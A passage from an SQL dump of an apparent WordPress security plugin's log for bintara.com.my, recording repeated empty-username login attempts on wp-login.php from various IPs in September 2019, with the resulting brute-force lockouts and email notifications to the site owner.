empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY3OTDrcQxTmGrCWuaVvQAAAcw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"69.0.149.222\";s:11:\"REMOTE_PORT\";s:5:\"50608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY3OTDrcQxTmGrCWuaVvQAAAcw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077050.0953\";s:12:\"REQUEST_TIME\";s:10:\"1569077050\";}}','notice','2019-09-21 14:44:11','2019-09-21 14:44:10',18163688,19653632,'https://bintara.com.my/wordpress/wp-login.php',1,0,'69.0.149.222'),(26365,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:44:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:44:10\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:44:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:44:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:44:11','2019-09-21 14:44:10',18247984,19653632,'https://bintara.com.my/wordpress/wp-login.php',1,0,'69.0.149.222'),(26366,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:44:11','2019-09-21 14:44:10',18454880,19653632,'https://bintara.com.my/wordpress/wp-login.php',1,0,'69.0.149.222'),(26367,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY3dXkXpgmG5P@iB8lBTgAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"207.38.86.146\";s:11:\"REMOTE_PORT\";s:5:\"54996\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY3dXkXpgmG5P@iB8lBTgAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077109.3895\";s:12:\"REQUEST_TIME\";s:10:\"1569077109\";}}','notice','2019-09-21 14:45:10','2019-09-21 14:45:09',18162144,19649680,'https://bintara.com.my/blog/wp-login.php',1,0,'207.38.86.146'),(26368,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:45:09\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:45:09\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:45:09\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:45:09\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:45:10','2019-09-21 14:45:09',18246896,19649680,'https://bintara.com.my/blog/wp-login.php',1,0,'207.38.86.146'),(26369,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:45:10','2019-09-21 14:45:09',18453472,19649680,'https://bintara.com.my/blog/wp-login.php',1,0,'207.38.86.146'),(26370,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY3vViJ7D9Gn7wDPh8nsQAAAMw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"107.190.129.90\";s:11:\"REMOTE_PORT\";s:5:\"57338\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY3vViJ7D9Gn7wDPh8nsQAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569077181.563\";s:12:\"REQUEST_TIME\";s:10:\"1569077181\";}}','notice','2019-09-21 14:46:22','2019-09-21 14:46:21',18165992,19653448,'https://bintara.com.my/wordpress/wp-login.php',1,0,'107.190.129.90'),(26371,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:46:21\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:46:21\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:46:21\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:46:21\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:46:22','2019-09-21 14:46:21',18250880,19653448,'https://bintara.com.my/wordpress/wp-login.php',1,0,'107.190.129.90'),(26372,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:46:22','2019-09-21 14:46:21',18457736,19653448,'https://bintara.com.my/wordpress/wp-login.php',1,0,'107.190.129.90'),(26373,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4AHkXpgmG5P@iB8lB1wAAAJc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.5.179\";s:11:\"REMOTE_PORT\";s:5:\"37638\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4AHkXpgmG5P@iB8lB1wAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077250.6426\";s:12:\"REQUEST_TIME\";s:10:\"1569077250\";}}','notice','2019-09-21 14:47:35','2019-09-21 14:47:34',18162800,19651688,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.5.179'),(26374,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4AViJ7D9Gn7wDPh8nxQAAAME\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.79.223\";s:11:\"REMOTE_PORT\";s:5:\"46752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4AViJ7D9Gn7wDPh8nxQAAAME\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077250.6373\";s:12:\"REQUEST_TIME\";s:10:\"1569077250\";}}','notice','2019-09-21 14:47:35','2019-09-21 14:47:34',18160584,19650432,'https://bintara.com.my/blog/wp-login.php',1,0,'162.144.79.223'),(26375,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:47:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:47:34\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:47:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:47:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:47:35','2019-09-21 14:47:34',18245432,19650432,'https://bintara.com.my/blog/wp-login.php',1,0,'162.144.79.223'),(26376,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:47:35','2019-09-21 14:47:34',18452056,19650432,'https://bintara.com.my/blog/wp-login.php',1,0,'162.144.79.223'),(26377,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4DnkXpgmG5P@iB8lB4gAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.141.141\";s:11:\"REMOTE_PORT\";s:5:\"60296\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4DnkXpgmG5P@iB8lB4gAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077264.7648\";s:12:\"REQUEST_TIME\";s:10:\"1569077264\";}}','notice','2019-09-21 14:47:49','2019-09-21 14:47:48',18159864,19649696,'https://bintara.com.my/test/wp-login.php',1,0,'162.144.141.141'),(26378,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:47:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:47:48\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:47:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:47:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:47:49','2019-09-21 14:47:48',18243944,19649696,'https://bintara.com.my/test/wp-login.php',1,0,'162.144.141.141'),(26379,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:47:49','2019-09-21 14:47:48',18450648,19649696,'https://bintara.com.my/test/wp-login.php',1,0,'162.144.141.141'),(26380,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 